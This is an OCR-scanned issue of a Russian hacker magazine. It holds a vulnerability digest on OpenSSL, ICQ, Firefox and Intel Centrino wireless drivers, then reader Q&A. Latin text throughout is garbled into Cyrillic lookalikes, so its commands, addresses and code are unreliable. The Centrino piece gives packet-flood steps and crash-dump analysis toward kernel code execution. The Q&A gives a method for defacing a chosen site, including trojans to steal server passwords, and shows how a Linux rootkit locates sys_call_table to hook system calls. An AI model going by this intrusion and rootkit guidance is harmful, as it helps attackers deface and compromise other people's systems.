ческими вкладками) лежат на ѵѵѵѵѵѵ.ітс.ога/ 
Іе11-орепрдр/таі1-агс1ііѵе/тзд14307.1і1пп1 . 

Тагдеіз 

Уязвимости подвержены РЗА-ключи с экс- 
понентой 3, которые достаточно широко ис- 
пользуются не только в Ореп88І_ (уязвимы 
все версии, вплоть до 0.9.8Ь, входящие в со- 
став практически всех ЫІМІІХ'ов и хВ8Э), но 
также воплощены в кремнии и железе: мар- 
шрутизаторах СІСЗО, ІВМ и т.д. 

Ехріоіі 

Отсутствует. 

Зоіиііоп 

Скачать последнюю ОрепЗЗЬверсию с 
официального сайта проекта или устано- 
вить патч, взятый оттуда же: ѵѵѵѵѵѵ.орепззі. 
огд/пе\д/з/раІсІп-СѴЕ-2006-4339.ІхІ . 



Вгіеі 

За минувший месяц в популярном интер- 
нет-пейджере ІСО обнаружились две 
дыры. Первая, связанная с ІСО іооІЬаг, 
позволяет злоумышленнику читать содер- 
жимое файла ЯЗЗ, вызывать іооІЬаг-мето- 
ды (ЯеІгезИЯЗЗ, ОрепРеесІ, МагкАзЯеасІ, 
ОрепЯЗЗОіаІод, ОрепЯЗЗЫеѵѵОіаІод), 
просматривать содержимое текущей 
ѴѴЕВ-страницы и воровать соокіез, содер- 
жащие конфиденциальную информацию. 
Это делается путем копирования файла 
«ор1іопз2.ІтіппІ», лежащего в папке с ІСО 
іооІЬаг'ом, и размещения его на любом из 
«хакерских» сайтов после надлежащей 
модификации. Технические детали можно 
узнать на ѵѵѵѵѵѵ.зесигіМосиз.сот/ 
агсЫѵе/1 /44551 5/30/0/ІІпгеасІесІ . Другая, 
более опасная дыра, связана с отсутстви- 
ем контроля длины некоторых полей в ІМ- 
сообщениях, отправляемых получателю 
напрямую, без использования сервера. 
Переполнение буфера происходит в фун- 
кции МСЯедЕхЗеагсН(), которая вызывает 
тетзе{() Для очистки буфера, выделенно- 
го из динамической памяти (кучи), не про- 
веряя при этом фактический размер бло- 
ка, в результате чего следует отказ в 
обслуживании (технические детали до- 
ступны по ссылке: ѵѵѵѵѵѵ.согезесигііѵ.сот/ 
іпс!ех.рІлр5?ас1:іоп=і1:ет&ісІ=1 509 ^. Выпол- 
нение зИеІІ-кода, как это сообщалось на 
ѵѵѵѵѵѵ.зесигіІѵІосиз.сот/ЫсІ/19897/сІізсизз . 
на самом деле невозможно. Обе уязвимос- 
ти были обнаружены командой Соге Теат. 

Тагдеіз 

ІСС ТооІЬаг 1 .2, 1 ,3/ІСС Рго 2003 Ь, ІСС 99а 2.21 . 

Ехріоіі 

Не требуется. 

8оІиііоп 

Отключить ІСО ІооІЬаг и установить све- 
жую заплатку от производителя в соот- 
ветствии со своей версией ІСО: ѵѵѵѵѵѵ. 
зесигіІуІосиз.сот/ЫсІ/19897/зоІи1іоп . 



Вгіеі 

РігеРох и родственные ему продукты 
(ЗеаМопкеу, Сатіпо, ТІгипсІегЫгсІ) теряют 
статус безопасного браузера, и свежие 
дыры обнаруживаются одна за другой, поз- 
воляя злоумышленнику выполнять зловред- 
ный зНеІІ-код в контексте уязвимого прило- 
жения, вызывать крэш браузера, запускать 
^ѵа8сгір{ с повышенными привилегиями, 
вплоть до передачи управления на машин- 
ный код, воровать секретную информацию 
и т. д. Отсутствие атак объясняется относи- 
тельно невысокой распространенностью 
РігеРох'а — это лишь уменьшает вероят- 
ность атаки, но не исключает ее полностью, 
ктомуже интерес хакеров к РігеРох'у растет 
в геометрической прогрессии, и скоро в 
сети появятся странички, изготовленные 
специально для атаки на РігеРох. 
Бессмысленно разбирать каждую из обнару- 
женных дыр, поэтому мы решили ограни- 
читься одним лишь перечнем ссылок, 
который лежит на ѵѵѵѵѵѵ.зесиигііѵіосиз. 
сот/ЫсІ/18228/геІегепсез . 

Тагдеіз 

МогіІІа Сатіпо / МогіІІа Рігеіох / МогіІІа 
8еаМ о п кеу / М 02 І I Іа ТИ и п сі е г Ь і гб/. 

Ехріоіі 

Для реализации большинства уязвимо- 
стей никакого специально написанного 
ехріоіі'а не требуется, и атака осуществля- 
ется непосредственно из самого браузера. 

Зоіиііоп 

Задействовать режим автоматического об- 
новления и почаще просматривать ново- 
стной канал на сайте производителя, одна- 
ко обновленные версии нарушают работу 
некоторых расширений, заставляя нас вы- 
бирать между безопасностью и комфорт- 
ной работой. Как вариант, можно пересесть 
на браузеры Орега или І_іпкз, ошибки кото- 
рых можно свободно пересчитать по паль- 
цам одной руки. 
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О Удаленное управление 
в Іпіеі Сепігіпо РПО ѴѴігеІе$$ 
Ыеіѵѵогк с ядерными привилегиями 

Вгіеі 

3 сентября 2006 года в 14:37:48 по восточ- 
ному стандартному времени хакер ОоНппу 
СасНе описал принципиально новую атаку 
на драйвера устройств беспроводной свя- 
зи Іпіеі Сепігіпо РРЮ, открывающую новую 
страницу в книге переполняющихся буфе- 
ров : ІМзщітитшііузе^ 
Іѵбаѵе/2006-Зер1етЬег/003459.ііітІ . 
Используя ошибки синхронизации — гасе 
сопбіііоп, вполнетипичные для драйверов и 
хорошо известные каждому пользователю 
по голубому экрану смерти с ругательством 
ІРС)І__МОТ_І_ЕЗЗ_ОР_ЕОІІАІ_, ему удалось 
не только получить отказ в обслуживании, 
но и воздействовать на регистр ЕІР с пере- 
дачей управления на зііеІІ-код, исполняю- 
щийся в режиме ядра, то есть на самом вы- 
соком уровне привилегий, который только 
возможен. Данная атака заслуживает 
всестороннего изучения, вот почему она 
была вынесена в отдельную статью. 

Тагдеіз 

В настоящее время под угрозой находятся 
следующие устройства: Іпіеі РРО/ѴѴігеІезз 
2915АВО 9, 2915АВО 10, 2200ВѲ 9, 2200ВѲ 
8, 2200ВѲ 10, однако список уязвимых 
драйверов все еще составляется. Кроме 



того, аналогичные ошибки синхронизации 
встречаются в драйверах, ОЗІ_-модемах, 
ИК-адаптерах, Голубых Зубьях и других уст- 
ройствах, обрабатывающих асинхронные 
запросы. 

Ехріоіі 

Не требуется. 

Зоіиііоп 

Отключи беспроводные устройства (за- 
действуй их только при острой необходи- 
мости) или установи пакет обновления от 
Іпіеі: зиррогі.іпіеі.сот/зиррогі/ѵѵігеіезз/ѵѵіап/ 
зЬ/СЗ-023065.іііт . размер которого со- 
ставляет порядка 100 Мб. 

Оеіаііз 

Ритуал вызова бага, появление которого 



сопровождалось голубым экраном смерти, 
в общих чертах выглядел так: 

1. ^бппу СасНе установил на жертву, снаб- 
женную картой беспроводного доступа Іпіеі 
Сепігіпо РРЮ, утилиту пеісаі (входит практи- 
чески влюбой І_ІШХ-дистрибутив, бесплат- 
ный порт для ѴѴіпсІоѵѵз можно нарыть на 
ѵѵѵѵѵѵ.ѵиІпѵѵаісіі.ога/пеісаО . заставив ее слу- 
шать 2048 порт (в принципе, можно обой- 
тись и без этого: прослушивание лишь уве- 
личивает вероятность успешной атаки); 

2. Атакующий узел начал бомбардировать 
жертву ІЮР-пакетами размером 1400 байт, 
заполненными для наглядности ССіі-байта- 
ми и поступающими на 2048 порт с интерва- 
лом в 400 микросекунд между ними. 

3. Одновременно с этим атакующий напра- 
вил шторм сіізаззосіаііоп-запросов («сііз- 
аззосіаііоп гедиезіз») с интервалом 4000 



> Обработка прерываний на однопроцес- 
сорной машине 



_ід. 

■-.-.'Л 



> Приоритеты прерываний в ЫТ 











РѴі К* "ЛЬ' ІЧ'Т* - 




[ :-Ь 




г--.*. 




1.РЪ. ь 








І.чГг. ' 




ІІ-Л, -ь , 




РІО 




К' >ліѵ 





9 кщпя 



/056 



ХАКЕР 10/94/06 






Прсршп нс 



Рлс^айін:н 



> «Срыв» синхронизации и его последствия 

микросекунд. «ЭІзаззосіаИоп гециезі» — это 
одно из 6-ти командных сообщений беспро- 
водного протокола, черновое описание ко- 
торого лежит на ІооІз.іеІІ.ога/ѵѵа/пеІІтт/ 
бгаІ1-аіаге11а-пе1Ітт-сІ1-ргоІосоІ-00.ІхІ . 

4 . ВЗОЭ не заставил себя долго ждать — и 
система рухнула. Эксперименты показали, 
что вероятность возникновения голубого 
экрана смерти зависиттолько от скважнос- 
ти пакетов, но отнюдь не от их содержимого, 
как и должно быть в ситуации с ошибкой 
синхронизации. 

Зоітппу Сасбе приложил к своему посту 
ссылки на дампы памяти ѴѴіпсІоѵѵз ХР: 
ѵѵѵѵѵѵ. 802.1 Ітегсепагѵ.пеі/щоітпѵсзіт/ргопе 
Іо 0ІеІеІіоп/бсІ/сгазІт2.2Ір (ВЗСЮ без подме- 
ны ЕІР или, выражаясь его терминологией, 
ипзиссеззіиііу аііетрі Іо даіп ЕІР) и 
ѵѵѵѵѵѵ. 802.1 Ітегсепагѵ.пеі/щоітпѵсзіт/ргопе 
Іо сІеІеІіоп/сІсІ/сгазІтЗ.гір (ВЗОР суспешной 
подменой ЕІР). Готовой атакующей про- 
граммы с зітеіі-кодом на борту предостав- 
лено не было, но ее сможет написать каж- 
дый желающий, однако прежде, чем 
погружаться в анализ дампов, занимаю- 
щих в своей совокупности свыше 200 Мб, 
мы должны рассмотреть механизм обра- 
ботки прерываний в І\ІТ, иначе ничего не бу- 
дет понятно. Прерываниями называются 
события, поступающие от оборудования, 
генерируемые процессором или операци- 
онной системой в определенные моменты 
времени — например, когда ЭМА-контрол- 
лер завершает передачу данных или тай- 
мер говорит «щелк». Обработка прерыва- 
ний происходит в соответствии с их 
приоритетом: прерывания с более высо- 
ким приоритетом прерывают менее при- 
оритетные прерывания (извиняюсь за тав- 
тологию :)), возвращая им управление 
после того, как они будут обработаны. Ап- 




паратные контроллеры прерываний обес- 
печивают до 256 уровней приоритетов, од- 
нако І\ІТ не поддерживает их, предпочитая 
использовать свою собственную систему 
приоритетов, известную под аббревиату- 
рой ІРОІ_ (ІпІеггирІ Вециезі І_еѵеІз — уровни 
запроса прерываний). 

В ЫТ существует всего 32 уровня, пронуме- 
рованных целыми числами от 0 до 31. Уро- 
вень 0 имеет минимальный приоритет, 31 — 
максимальный. Нормальное выполнение 
потока происходит на нулевом уровне, на- 
зываемом пассивным (РАЗЗІѴЕ), и его мо- 
жет прерывать любое асинхронное собы- 
тие, возникающее в системе. При этом 
операционная система повышает текущий 
I РОЕ до уровня возникшего прерывания и 
передает управление его ІЗР (ІпІеггирІ 
Зегѵісе Воиііпе — Процедура обработки 
прерывания), предварительно сохранив со- 
стояние текущего обработчика. 

Приоритеты с номерами 1 и 2 отданы под про- 
граммные прерывания (например, возникаю- 
щие при ошибке обращения к странице памя- 
ти, вытесненной на диск), а все остальные 
обслуживают аппаратные прерывания от пе- 
риферийных устройств, причем прерывания 
оттаймераимеютприоритет28. 

Покажем, как происходит обработка пре- 
рываний, поступающих от устройств. До- 
пустим, поток А работает на уровне I РОЕ, 
равном РАЗЗІѴЕ_І_ЕѴЕЕ Устройство Эеѵісе 
1 возбуждает аппаратное прерывание с 
уровнем ОІПОІ_ (Эеѵісе ІПОЕ то есть ІРЮІ_ с 
номером от 3 до 31 включительно). Ось пре- 
рывает выполнение потока А, повышает 
ІПС)І_ до ЭІРЮІ_ и передает управление на 
ІЗР-устройства Эеѵісе 1. Обработчик пре- 
рывания обращается к устройству Эеѵісе 1, 
делает с ним все, что оно требует, ставит в 
очередь отложенную процедуру ЭрсРогІЗР 



для последующей обработки и понижает 
ІПОІ_ до прежнего уровня. Отложенные про- 
цедуры ЭеІеггесІ Ргосебиге СаІІз (сокращено 
— ЭРСз) выполняются на I РОЕ, равном 2 
(□ІЗРАТСН_І_ЕѴЕІ_) и потому не могут начать 
свою работу вплоть до выхода из ІЗР. Пре- 
рывания, возникающие во время выполне- 
ния ІЗР, маскируются. Если прерывание 
возникнет во время выполнения ЭрсРогІЗР, 
то операционная система прервет ее ра- 
боту, передаст управление ІЗР, который 
поставит в очередь еще одну отложенную 
процедуру, и вновь возвратится в 
ЭрсРогІЗР. Таким образом, сколько бы 
прерываний ни возникало, отложенные 
процедуры обрабатываются последова- 
тельно, в порядке очереди. 

На двухпроцессорных машинах картина 
несколько усложняется. Допустим, что во 
время обработки отложенной процедуры 
ЭрсРогІзг, выполняющейся на процессоре 
0, устройство Эеѵісе 1 вновь сгенерирова- 
ло сигнал прерывания, посланный процес- 
сору 1 (процессор 0 еще не успел завер- 
шить обработку ІЗР и не понизил ІРОІ_). Ось 
повышает ІРОІ_ процессора 1 до ЭІВС)І_ и 
передает управление на ІРЗ-устройства 
Эеѵісе 1, ставя отложенную процедуру 
ЭрсРогІзг в очередь. 

Когда ІЗР на обоих процессорах заверша- 
ются, система понижает ІРОІ_ — и начинает- 
ся выполнение отложенной процедуры 
ЭрсРогІзг, стоящей как в очереди процессо- 
ра 0, так и в очереди процессора 1. Да-да! 
Процедура ЭрсРогІзг исполняется сразу на 
обоих процессорах, одновременно отвечая 



X А К Е Р. Р II : ® Е V О Ш Т I О N 

Сайту «Хакера» уже много лет, и все годы 
мы, надеюсь, были для тебя лучшим сайтом 
о взломе, компьютерах, цифровой жизни и 
развлечениях. Однако даже лучшее можно 
усовершенствовать, чем мы в настоящий 
момент и занимаемся. Мы хотим изменить 
сайт: сделать его более красивым, напол- 
нить новыми возможностями и, конечно, но- 
выми материалами. 

Уже сейчас на сайте работают новые фору- 
мы ( НІІрѴ/Іогит.хакер.гиЛ . а с октября мы 
вводим в строй абсолютно новую ленту уяз- 
вимостей. Надеюсь, ты почерпнешь из нее 
много нового и станешь ее постоянным чи- 
тателем. 

И это только начало нашего переворота, так 
что смотри в оба! 
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за обработку двух прерываний от одного ус- 
тройства! Как вам это нравится?! В такой 
ситуации очень легко превратить совмест- 
но используемые данные в мешанину, воз- 
вратив неожиданный результат или заве- 
сить систему, вызвав В5СЮ. 

Атеперь разберемся с дампами памяти, по- 
лученными ЬоЬппу СасЬе. Распаковав ар- 
хив сгазН2.2Ір, мыувидимтрифайла: сгазІт2. 
іхі — краткое описание содержимого, 
сгазІт2.рсар — трафик, собранный 
зпіТТег'ом, и МЕМОЯѴ.ЭМР — полный дамп 
памяти. Вот он-то нам и нужен! Для его ана- 
лиза необходимо иметь либо ЭЭК для ХР 
(ЭЭК для ѴѴ2К не подходит), либо послед- 
нюю версию МісгозоЙ ЭеЬиддіпд Тооіз, ко- 
торую можно бесплатно скачать с ѵѵѵѵѵѵ. 
тісгозоіі.сот/ѵѵЬбс/беѵіооІз/беЬиааіпа/ 
сіеіаиіі.ппзрх . 

МісгозоЙ предоставляет множество утилит 
дляразборааварийныхдампов, номы, какна- 
стоящие хакеры, будем пользоваться кон- 
сольным отладчиком І386кс1, который рулит, а 
все остальные графические поделки отдыха- 
ют. Командная строка для запуска выглядит 
приблизительно так: 

І386кс1 -2 Ь:\Ьитр8\сгазЬ2\тетогу.сІтр -Іодо ту_оиі 

Здесь «Е:\битрз\сгазЬ2\тетогу2.сІтр» — 
путь к дампу, «ту_оиі» — имя файла, в кото- 
рый будет записываться лог(если, конечно, 



он нам нужен). Еще можно указать ключ «у 
ЗЯѴ*0:\5ут*Ь{{р://тзбІ.тісгозо{і.сот/ 
сІоѵѵпІоасІ/зутЬоІз», чтобы отладчик дина- 
мически подгружал необходимую символь- 
ную информацию из сети, однако в нашем 
случае она будет лишней, так что без нее 
вполне можно обойтись. 

Поехали! Отладчик заглатывает дамп, сооб- 
щая, что он был отрыгнут операционной сис- 
темой ѴѴіпсІоѵѵз ХР КегпеІ Ѵегзіоп 2600 (Зегѵісе 
Раск 2) и что причиной аварии стал ВыдСІтеск- 
код 01 Ь со следующими параметрами: 
6еЗс2081, 2, 0, {7433678. Вероятным виновни- 
кам вызова явился драйвер \д/22п51.зуз, 
управляющий (по нашим данным) беспровод- 
ной сетевой картой ІпіеІ Сепігіпо. Далее сле- 
дует совет «изе іапаіуге -ѵ іо деі сіеіаііесі 
беЬиддіпд іпіогтаііоп» (набери «іапаіуге -ѵ» 
для получения детальной отладочной инфор- 
мации) и приглашение к вводу, отмеченное 
лениво мерцающим курсором с «ксЬ». 
Набираем, как нас просят, «іапаіуге -ѵ» и по- 
лучаем следующий отчет, приведенный ниже 
с несущественными сокращениями: 

Анализ дампа памяти, вызвавшего ВЗОР, но 
не оказавшего воздействия на регистр ЕІР 

ксІ> Іапаіуге-ѵ 

□НІѴЕНЧНаиЧОТЩЕЗЗ_ОР1_ЕС)ІІАІ_ (сП ) 

Агдитепіз: 

Агді : 6еЗс2081 , тетогу геіегепсесі 
Агд2: 00000002, ІРЮЬ 
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АгдЗ: 00000000, ѵаіие 0 = геасі орегаііоп, 1 = ѵѵгііе 
орегаііоп 

АгЙ {7433678, асІсІгеззѵѵГіісГі геіегепсесі тетогу 

ОеЬиддіпд Оеіаііз: 

НЕАО_АООНЕЗЗ: 6еЗс2081 
С11ВВЕ1\ГГ_1Р(Х: 2 

РАІЛ_ТІІ\І(3_ІР: 

ШШШШ лбШ 

{7433678 8а11 тоѵ сІЦесх] 



ЗТАСК_ТЕХТ: 

8054е9е0 65537365 2іЗс746е 656сІ616е 200а0сІЗе 
7479426с 00000000 00000000 00000000 00000000 

■пни 

ІМАОЕ_І\ІАМЕ: \л/22п51.зуз 

Вместо бессловесного Ьех-значения 
ВидСІтеск кода мы получили его наимено- 
вание — ЭЯІѴЕЯ_ІЯС)І__МОТ_І_ЕЗЗ_ОЯ_ЕС)- 
ЕІАІ_, означающее, что драйвер осущест- 
вил попытку выполнить операцию, 
недозволенную на данном уровне ІЯОІ_ ( в 
данном случае равном 2), что соответству- 
ет Э13РАТСН_1_Е\/Е1_, на котором выпол- 
няются отло- 

женные процедуры, о проблемах 
синхронизации которых мы уже говорили. 
Драйвер пытается прочесть ячейку 
6ЕЗС2081И, находящуюся в странице памя- 
ти, вытесненной на диск (на уровне 
ЭІЗРАТСН_І_ЕѴЕІ_ подкачка не работает). 
Это очевидная ошибка драйвера, указыва- 
ющая на серьезное разрушение структур, 
обрабатываемых им данных (в данном слу- 
чае — фреймов пакетов). Тем не менее, ЕІР 
находится в пределах драйвера \л/22п51. 
зуз, и в стеке нет никаких следов присутс- 
твия ССЬ-байт, которыми «заряжены» ата- 
кующие пакеты. Так что все, что мы имеем, 
— это тривиальный отказ в обслуживании. 
Идем дальше и загружаем в отладчик 
тетогуЗ.сІтр, который, по утверждению 
Ьоітппу Сасіте, оказал убийственное воз- 
действие на регистр ЕІР. Что ж, посмотрим- 
посмотрим: 

І386кс1 -2 Ь:\сІитрз\сгазГі2\тетогу2.сІтр -Іодо оиіЗ 

После команды «Іапаіуге -ѵ» отладчик вы- 
дает следующий результат, приводимый 
здесь страдиционными сокращениями: 
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> Сетевые коты водятся и под І\ІТ 




> Анализ дампа памяти в отладчике І386кс1 

сссссссі 01 963 Ы Оіісіб аЦЦ [езі + 0хсІ6^1 03Ь],есІх 



сссссссІ586с4 


хсГід 


а ЬМ 




сссссссІ70100 


асісі 


Геахіеах 




сссссссІЭ 0000 


асісі 


Геахіаі 




сссссссІЬ 0000 


асісі 


[еах],аІ 


сссссссісі 0000 


асісі 


[еах],аІ 



і памяти, оказавшег 
твие на регистр ЕІР 

ксІ> Іапаіухе -ѵ 

□ніѵЕнчнаи\ютщЕ53_он_ЕС)ііАі_ (сіі ) 

Агді : 5с01 аЫ7, тетогу геіегепсесі 

ИИ: о ШШШШШШ 

Ийв : ^Мшшвшшаишшштшш^ш 

^регаііоп 

Агд4: сссссссі, асісігезс ѵѵИісіі геіегепсесі тетогу 




|іпд Оеіаііз: 



ОРПЕЗЗ: 
СУРІЕІЕКГПШІ-: 



5с01аЬі7 

2 



ттшшш 

+іііііііі сссссссі 

ттЛШтФ№шттшт - МНМИИ 



ЗТАСК_ТЕХТ: 

сссссссс ІІІОЗЬЭб 0Ю486Р6 00000000 

01с486сІ6 
ОхііЮЗЬЭб 




На первый взгляд ничего не изменилось — 
все тот же противный 0Р1\/ЕРМРЮ1__1\10Т_ 
І_ЕЗЗ_ОР_ЕОІІАІ_, возникающий на уровне 
□ІЗРАТСН_І_ЕѴЕІ_, но присмотрись к значе- 
нию регистра ЕІР, вылетевшему далеко за 



пределы драйвера и указывающему на ин- 
струкцию «асісі [езі+ОхсІбіИОЗЬ], есіх», слу- 
чайно очутившуюся по адресу СССССССРіі, 
который очень сильно смахивает на начинку 
атакующего пакета. Но почему же тогда ЕІР 
равен неССССССССН, а СССССССРіі, кото- 
рого в пакете не было?! 

Все просто! Страница с адресом 
ССССССССіі случайно оказалась в опера- 
тивной памяти и не была вытеснена на 
диск. Поэтому, как только пакет-камикадзе 
передвинул регистр ЕІР на адрес 
ССССССССіі, процессор начал выполне- 
ние кода, каждый раз увеличивая ЕІР на 
размер успешно выполненной команды. 
Он споткнулся лишь тогда, когда встретил 
инструкцию «абб [езі+0хсІ6Ш03Ь], есіх», 
обратившуюся к ячейке 5С01АВР7Н, кото- 
рой не было в оперативной памяти, а под- 
качка на уровне 013РАТСН_1_Е\/Е1_, как уже 
говорилось, не работает. Вот операцион- 
ная система и сказала «мяу». 

Чтобы подкрепить наше предположение 
фактами, травой и грибами, находясь в от- 
ладчике, дадим команду «и СССССССС», 
чтобы дизассемблировать код по данному 
адресу: 

іазт-листинг окрестностей аварии 

кЬ>и сссссссс 

ссссссссі 86с4 хсГід аіі.аі 



Первой идет неизвестная отладчику 
І386кс1 недокументированная команда 
ЗЕТАІ_С (Зеі АІ іо Саггу РІад), а за ней — 
ХСНО АН,АІ_. Обе эти команды выполня- 
ются успешно. Но как только процессор 
доходит до команды «АОО [ЕЗІ+0ХО6РР 
103В], ЕОХ», расположенной по адресу 
СССССССРіі и обращающейся к недос- 
тупной ячейке 5С01АВР7І1, возникает ис- 
ключение, и операционная система пока- 
зывает голубой экран. 

Таким образом, воздействие на регистр 
ЕІР путем направленного шквала пакетов 
все-таки возможно! Поскольку отправ- 
ляемые ЕЮР-пакеты находятся в стеке, то 
в них легко внедрить зііеІІ-код, главное — 
определить, какое именно двойное слово 
из начинки пакета попадает в ЕІР, что лег- 
че всего выяснить экспериментально, пу- 
тем замены части ОСИ на РРіі или тщатель- 
ного изучения дизассемблерных текстов 
драйвера. Отладчик здесь — плохой по- 
мощник, поскольку он изменяет времен- 
ные промежутки (тайминги), непредска- 
зуемым образом воздействуя на гасе 
сопсііііоп. Кстати, на двухпроцессорных 
машинах (равно как машинах, оснащен- 
ных двуядерными процессорами) ошибки 
синхронизации проявляются намного 
чаще, что открывает невиданные ранее 
просторы для удаленных атак. Ійі 
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зкІуагоО@таіІ.ги, 
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О: Как задефейсить сайт? 

А:Наобщийвопросможнодатыолькообщий 
ответ. Мы не будем рассматривать метод, ко- 
торым пользуются все скрипткидисы, то есть 
когда по известной баге в обычном поискови- 
ке ищется уязвимый сайт и совершается де- 
фейс. Рассмотрим случай, когда тебе нужно 
задефейсить конкретный сайт, об уязвимос- 
тях которого ничего не известно. Существует 
несколько основных способов сделать это. 

1. Начни с поиска багов в скриптах самого сай- 
та. Если сайт обвешан форумами, гостевыми 
книгами, системами управления контентом 
и т.п., то будь уверен, что сайт имеет ошиб- 
ки. Причем чем больше скриптов и чем они 
объемнее, тем больше ошибок. Ты можешь 
воспользоваться каким-нибудь сканером 
безопасности, который протестирует сайт на 
известные бажные скрипты, но если сканер 
ничего не найдет, то это не значит, что ошибок 
нет. Пробуй искать ошибки ручками, подстав- 
ляй различные значения, делай нестандарт- 
ные запросы. Об ошибках в СО I- и РНР-скрип- 
тах мы уже писали неоднократно. 

2. Но что делать, если бажный скрипт не уда- 
ется найти, или сайт вообще сделан начистом 
НТМІ_? Не нужно отчаиваться. Обычно сайт 
расположен на сервере, на котором хостятся 
еще другие сайты. Если тебе удастся сломать 
один из этих сайтов, то в итоге ты сможешь 
получить доступ к нужному тебе. Для опреде- 
ления доменов, которые расположены насер- 
вере хостера, лучше воспользоваться специ- 
альными сервисами вроде ѵѵѵѵѵѵ.ботаіпіооіз. 
сот или ѵѵѵѵѵѵ.ботаіпзбЬ.пеІ. Выбирай сайт, 



О: Подскажи простой способ, как по 
имени домена узнать ІР-адрес? 

А: Самый простой способ — воспользоваться 
утилитой пзіоокир, которая стандартно при- 
сутствует в каждой полноценной операцион- 
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ной системе (ѴѴіпбоѵѵз, І_іпих, В5Э и пр.). Эта 
утилита позволяет произвести ЭЫЗ-преобра- 
зования в явном виде. Например: 



гобвешанный скриптами, и воспользуйся пун- 
ктом 1. 

3. А что делать, если сайт расположен на выде- 
ленном сервере, и первые два способа не ра- 
ботают? Этот случай сложнее, поэтому нужно 
смотреть по ситуации. Попробуй проскани- 
ровать порты сервера и посмотреть баннеры 
сервисов на открытых портах. Если админ — 
лох, то там может оказаться бажный сервис, 
под который имеется публичный эксплоит. 
Но это вряд ли. Поэтому некоторые сетевые 
подонки снимают баннеры со всех сервисов 
и ждут момента, когда появится публичный 
эксплоит под один из них. Админы не момен- 
тально обновляют ПО — обычно до этого мо- 
мента проходит минимум несколько часов. 
За это время можно успеть воспользоваться 
эксплоитом и задефейсить сайт. 

Часто пароли к РТР/ЗЗН/МуЗОІ_-сервисам 
хозяин сайта хранит на своем домашнем 
или рабочем компьютере, так что ты можешь 
воспользоваться обычнымтрояном для ихпо- 
лучения. Как впарить троян, мы тоже писали 
неоднократно. 

Я назвал все основные способы. А вообще, 
зачем тебе заниматься дефейсами? Дефейс 
— это противозаконно, слушайся лучше маму 
и папу, делай уроки. Помни, что за дефейс 
сайта тебе взамен могут устроить страшный 
дефейс натвоем собственном лице. 



> пзіоокир ѵѵѵѵѵѵ. хакер, ги 
Зегѵег: пз.игіс.ги 
Асісігезз: 195.38.32.2 



[Моп-аиИпогИаНуе апзѵѵег: 
Ыате: ѵѵѵѵѵѵ. хакер, ги 
Асісігезз: 194.67.128.2 



Этот вывод означает, что был опрошен ЭЫЗ- 
сервер пз.игіс.ги (его ІР-адрес 195.38.32.2) и 
получен ответ ІР ( ѵѵѵѵѵѵ.хакер.ги і = 194.67.128.2. 
Эта же утилита позволяет произвести обрат- 
ное преобразование: 



> пзіоокир 194.67.128.2 
Зегѵег: пз.игіс.ги 
Асісігезз: 195.38.32.2 



Ыате: дате-іапсі.гті.ги 
Асісігезз: 194.67.128.2 



Как видишь, в реальности за ІР-адресом 
194.67.128.2закрепленоимядате-Іапб.гтЕги, 
следовательно, ѵѵѵѵѵѵ.хакер.ги является вирту- 
альным узлом. 



О: Пишу руткит под Ыпих для ядер вер- 
сии 2.6.x и столкнулся с такой бедой: в 
этих ядрах не экспортируется таблица 
системных вызовов зуз_саІІ_(аЫе. Как 
быть? 





взлом 




А: Да, ксожаяению, такая проблемаесть. Раз- 
работчики ядер в целях безопасности сдела- 
ли запрет на экспорт зуз_саІНаЫе, начиная с 
ядер версии 2.5.41 , поэтому простая подмена 
системных вызовов в этих ядрах не работает. 
Но хакерами были найдены способы обхода 
этого запрета. Я знаю три способа, как полу- 
чить адрес зуз_саІИаЫе: 

1. Первый способ описан в электронном жур- 
нале РНгаск#58 в статье « І_іпих оп-1Не-11у кегпеі 
раісбіпд ѵѵііііоиі І_КМ», но он зависит от теку- 
щей платформы и алгоритмически сложен. 

2. Адрес таблицы можно найти простым поис- 
ком в файле /Ьооі/Зузіет. тар, например: 

# дгѳр зуз_саІІ_іаЫе /Ьооі/Зузіѳт.тар 
с03сѳ760 Р зуз_саІИаЫе 

Теперь в модуле можно сделать присваивания 
следующего вида: 

ипзідпѳсі Іопд *зуз_саІИаЫе; 

*(Іопд *)&зуз_саІИаЫѳ=0хс03сѳ760; 

и далее осуществлять подмену обычным об- 
разом, как в ядрах версии 2.4.x. В своем мо- 
дуле ты можешь встроить функцию, которая 
открывала бы файл /Ьооі/Зузіет.тар и са- 
мостоятельно находила в нем адрес зуз_саІІ_ 
ІаЫе. 

3. Третий способ придумал и описал (с исход- 
ным кодом) в своей статье российский хакер 
беѵОісІ из ІІкЯЗесигіІуТеат. Ищи эту статью на 
ѵѵѵѵѵѵ.изізесипіѵ.іпіо . 

Вдобавок к перечисленному я тебе советую 
купить мою книгу «Программирование боево- 
го софта под І_іпих» (автор — Иван Скляров), 
где эти способы описаны более подробно, а 
также реализован и разобран учебный руткит 
и кейлоггерподядра2.6.х. 



О: Как откомпилировать модуль ядра 
Ыпих версии 2.6.x? 

А: Компиляция модулей для ядер 2.6.x суще- 
ственно отличается от компиляции модулей 
в ядрах 2.4.x. Сначала необходимо создать 
МакеТМе со следующим содержимым (в каче- 
стве примера возьмем модуль с названием 
тосі.с): 

оЬцт += тосі.о 

Затем нужно выполнить команду для сборки 
модуля следующего вида: 

# таке -С /изг/згс/Ііпих-'ипате -г' 51ІЕЮІП5=$РѴ\Ю 
тосіиіез 




В том случае, если у тебя в каталоге /изг/згс 
присутствует символическая ссылка Ііпих на 
каталоге исходными текстами ядра, то коман- 
да сборки будет выглядеть так: 

# таке -С /изг/згс/Ііпих 51)ЕЮ1Р{5=$РУ\Ю тосіиіез 

Как ты понимаешь, исходные тексты ядра 
должны быть установлены в твоей системе 
в каталог /изг/згс. Если у тебя исходные коды 
ядра отсутствуют, то их нужно установить, 
иначе сборка модуля закончится с ошибкой. 
Устанавливать пакеты удобно через КОЕ или 
Ѳпоте (ищи в меню функцию вроде «Установ- 
капрограмм»). Нужный пакете исходными ко- 
дами ядра обычно имеет название вида кегпеі- 
зоигсе-номер_версии. 

В результате выполнения команды в текущем 
каталоге образуется объектный файл модуля 
тосі.ко. Обрати внимание: в ядрах 2.6 объект- 
ные файлы модулей имеют расширение .ко, а 
не .о. 

Теперь модуль можно загрузить в ядро коман- 
дой: 

#іпзтосІ тосі.ко 

Просмотреть списокустановленных модулей 
можно командой Ізтофаудалить модуль — ко- 
мандой гттосі (здесь имя модуля указывается 
без расширения): 

# гттосі тосі 

О: Точно знаю, что на узле X работает 
8у$ІодсІ/514, однако птар говорит, что 
порт 514 закрыт. Как так? 

А: Если узел не находится за брандмауэром, 
а зузіодб не повешен на нестандартный порт, 
отличный от 514, то причина, скорее всего, 
